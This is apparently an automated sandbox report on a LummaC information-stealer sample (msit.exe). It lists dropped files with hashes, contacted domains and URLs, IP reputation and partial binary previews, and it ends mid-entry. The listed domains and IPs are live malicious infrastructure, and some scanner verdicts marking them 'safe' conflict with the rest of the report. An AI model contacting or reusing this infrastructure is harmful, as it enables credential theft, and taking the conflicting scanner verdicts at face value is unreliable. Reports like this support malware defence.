              C:\Users\user\AppData\Local\Temp\MSIA6C8.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSIA708.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\shi95F5.tmp0%ReversingLabs
              C:\Windows\Installer\MSIA16F.tmp0%ReversingLabs
              C:\Windows\Installer\MSIA1CE.tmp0%ReversingLabs
              C:\Windows\Installer\MSIA20D.tmp0%ReversingLabs
              C:\Windows\Installer\MSIA23D.tmp0%ReversingLabs
              C:\Windows\Installer\MSIA28C.tmp0%ReversingLabs
              C:\Windows\Installer\MSIA2BC.tmp0%ReversingLabs
              C:\Windows\Installer\MSIA2EC.tmp0%ReversingLabs
              C:\Windows\Installer\MSIA455.tmp63%ReversingLabsWin32.Exploit.LummaC
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://fixxyplanterv.click/api0%Avira URL Cloudsafe
              https://fixxyplanterv.click/LL0%Avira URL Cloudsafe
              https://fixxyplanterv.click/30%Avira URL Cloudsafe
              https://fixxyplanterv.click/apiK0%Avira URL Cloudsafe
              https://fixxyplanterv.click/apiDBcD0%Avira URL Cloudsafe
              fixxyplanterv.click0%Avira URL Cloudsafe
              https://fixxyplanterv.click/apijBqD0%Avira URL Cloudsafe
              https://fixxyplanterv.click/0%Avira URL Cloudsafe
              https://fixxyplanterv.click:443/api0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              fixxyplanterv.click
              104.21.6.116
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                dare-curbys.bizfalse
                  high
                  impend-differ.bizfalse
                    high
                    covery-mover.bizfalse
                      high
                      https://fixxyplanterv.click/apitrue
                      • Avira URL Cloud: safe
                      unknown
                      dwell-exclaim.bizfalse
                        high
                        zinc-sneark.bizfalse
                          high
                          fixxyplanterv.clicktrue
                          • Avira URL Cloud: safe
                          unknown
                          formy-spill.bizfalse
                            high
                            se-blurry.bizfalse
                              high
                              print-vexer.bizfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://html4/loose.dtdshi95F5.tmp.0.drfalse
                                  high
                                  https://duckduckgo.com/chrome_newtabdxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://fixxyplanterv.click/LLdxdiag.exe, 00000007.00000002.1708428233.0000000002ECC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icodxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://fixxyplanterv.click/dxdiag.exe, 00000007.00000003.1697924723.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676263312.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1697639523.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708678569.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676727815.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676142921.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1672261175.0000000002F75000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWdxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.rootca1.amazontrust.com0:dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYidxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://.cssshi95F5.tmp.0.drfalse
                                                        high
                                                        https://www.ecosia.org/newtab/dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.microXdxdiag.exe, 00000007.00000003.1697639523.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brdxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://fixxyplanterv.click/apiDBcDdxdiag.exe, 00000007.00000003.1672261175.0000000002F75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ac.ecosia.org/autocomplete?q=dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://fixxyplanterv.click:443/apidxdiag.exe, 00000007.00000003.1681695049.000000000525C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgdxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.c.lencr.org/0dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.i.lencr.org/0dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://fixxyplanterv.click/apiKdxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&udxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://fixxyplanterv.click/apijBqDdxdiag.exe, 00000007.00000003.1676727815.0000000002F72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctadxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgdxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://support.mozilla.org/products/firefoxgro.alldxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://.jpgshi95F5.tmp.0.drfalse
                                                                                      high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://fixxyplanterv.click/3dxdiag.exe, 00000007.00000002.1708678569.0000000002F72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.21.6.116
                                                                                        fixxyplanterv.clickUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1589843
                                                                                        Start date and time:2025-01-13 08:33:22 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 14s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:13
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:msit.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@12/42@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 50%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 51%
                                                                                        • Number of executed functions: 26
                                                                                        • Number of non-executed functions: 98
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.253.45
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target MSIA455.tmp, PID 6188 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        TimeTypeDescription
                                                                                        02:34:39API Interceptor8x Sleep call for process: dxdiag.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.21.6.116schost.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          fixxyplanterv.clickWSLRT.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.134.197
                                                                                          msit.msiGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.134.197
                                                                                          schost.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.6.116
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDFLARENETUStesr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.90.18
                                                                                          WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.134.197
                                                                                          msit.msiGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.134.197
                                                                                          Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 104.26.13.205
                                                                                          trow.exeGet hashmaliciousUnknownBrowse
                                                                                          • 188.114.96.3
                                                                                          https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                                                                                          • 104.17.25.14
                                                                                          https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5DkGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.40.50
                                                                                          g3.elfGet hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          g5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 104.26.12.205
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          a0e9f5d64349fb13191bc781f81f42e1tesr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.6.116
                                                                                          WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.6.116
                                                                                          msit.msiGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.6.116
                                                                                          PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.6.116
                                                                                          PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.6.116
                                                                                          L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.6.116
                                                                                          sE5IdDeTp2.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.6.116
                                                                                          NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.6.116
                                                                                          g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.6.116
                                                                                          lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.6.116
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Users\user\AppData\Local\Temp\MSI96A2.tmpmsit.msiGet hashmaliciousLummaC StealerBrowse
                                                                                            Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msiGet hashmaliciousUnknownBrowse
                                                                                              Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msiGet hashmaliciousUnknownBrowse
                                                                                                bmouJCkvam.msiGet hashmaliciousUnknownBrowse
                                                                                                  FS-SZHAJCVS.msiGet hashmaliciousUnknownBrowse
                                                                                                    FS-JFDIBGWE.msiGet hashmaliciousUnknownBrowse
                                                                                                      http://propdfhub.comGet hashmaliciousUnknownBrowse
                                                                                                        http://res.pdfonestartlive.comGet hashmaliciousUnknownBrowse
                                                                                                          740d3a.msiGet hashmaliciousUnknownBrowse
                                                                                                            740d3a.msiGet hashmaliciousPureCrypterBrowse
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1345
                                                                                                              Entropy (8bit):5.697582764423597
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:ImgMV8TvbdX6eSGV8TvRPV8TvBdUC+bV8TvjRpUmrw3w8dnwJFP9693DhiSqxt8v:Im36Qee92tmibD3P893D8SMtm
                                                                                                              MD5:15887813E42A4CCF123518039FE6C91C
                                                                                                              SHA1:A257ADAFAF627A8357C99D3BD98EAED23165C7F1
                                                                                                              SHA-256:7EC685336430AEE06C6DAF390AB3FEEE9B5B43F1601724C968C2B39AD20FF9AB
                                                                                                              SHA-512:59E1C06114EF19B2BE0589E961587553EED8973D86447B8006040497DB1C0BD2BBC63B8150FC9970CC217C20FBC8C78FD53E31BCFEC8FDD82D6F747ECBF82E7B
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:...@IXOS.@.....@S.-Z.@.....@.....@.....@.....@.....@......&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}..msit..msit.msi.@.....@.....@.....@........&.{EA6270CA-0126-4785-A430-33ABC9DC920B}.....@.....@.....@.....@.......@.....@.....@.......@......msit......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{86FA086C-1DD0-4082-AC92-FB7682CD7E34}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@......&.{F6D3DE48-10AF-4734-A48F-E26E13947E6F}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@......&.{39B1484E-9A16-4754-9B1B-81931D13A2A4}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@........CreateFolders..Creating folders..Folder: [1]".#.C:\Users\user\AppData\Local\Temp\.@..............0.......L...................$.N......................$.N........X......................................... ... .....$.....................$.N..........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..#.C:\Users\hu
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1021792
                                                                                                              Entropy (8bit):6.608380087035959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: msit.msi, Detection: malicious, Browse
                                                                                                              • Filename: Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msi, Detection: malicious, Browse
                                                                                                              • Filename: Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msi, Detection: malicious, Browse
                                                                                                              • Filename: bmouJCkvam.msi, Detection: malicious, Browse
                                                                                                              • Filename: FS-SZHAJCVS.msi, Detection: malicious, Browse
                                                                                                              • Filename: FS-JFDIBGWE.msi, Detection: malicious, Browse
                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                              • Filename: 740d3a.msi, Detection: malicious, Browse
                                                                                                              • Filename: 740d3a.msi, Detection: malicious, Browse
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1021792
                                                                                                              Entropy (8bit):6.608380087035959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1021792
                                                                                                              Entropy (8bit):6.608380087035959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1201504
                                                                                                              Entropy (8bit):6.4558508565404535
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:h4FsQxRqkY1ngOktwC2Tec+4VGWSlnH/YrjPWqTIUGFUrHtAkJMsFUh29BKjxm:a2QxNwCsec+4VGWSlnfYvOjUGFUrHtA2
                                                                                                              MD5:03CC8828BB0E0105915B7695B1EC8D88
                                                                                                              SHA1:CBF8EC531EA7E3EE58B51BD642F8BFABDC759EE1
                                                                                                              SHA-256:0E1491AE7344F3A5EC824732648CCDDA19B271D6F01471793BF292840FC83B5E
                                                                                                              SHA-512:593A76166EB6CE2E3537B0D93E216DAEF12E4AB5B181A194B55A90B39A1AF2E0374C4EC3833A000530425319A003CD1A648489640FCCAF108061EBEA1D9CB1E7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............@G..@G..@G.yCF..@G.yEF..@G.|CF..@G.|DF..@G.|EF..@G.yDF..@G.yAF..@G..AG..@G.}IF..@G.}@F..@G.}.G..@G...G..@G.}BF..@GRich..@G........PE..L...v..f.........."!...).~..........Pq.......................................`............@A........................ ...t...............................`=.......l......p........................... ...@...............L............................text...J}.......~.................. ..`.rdata...;.......<..................@..@.data...............................@....fptable............................@....rsrc...............................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):908128
                                                                                                              Entropy (8bit):6.595002426238024
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
                                                                                                              MD5:ACCD9092A35E468E8AF934ACCD81E9F6
                                                                                                              SHA1:3751384E5E586481618002469190E3C1F271CE6D
                                                                                                              SHA-256:8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
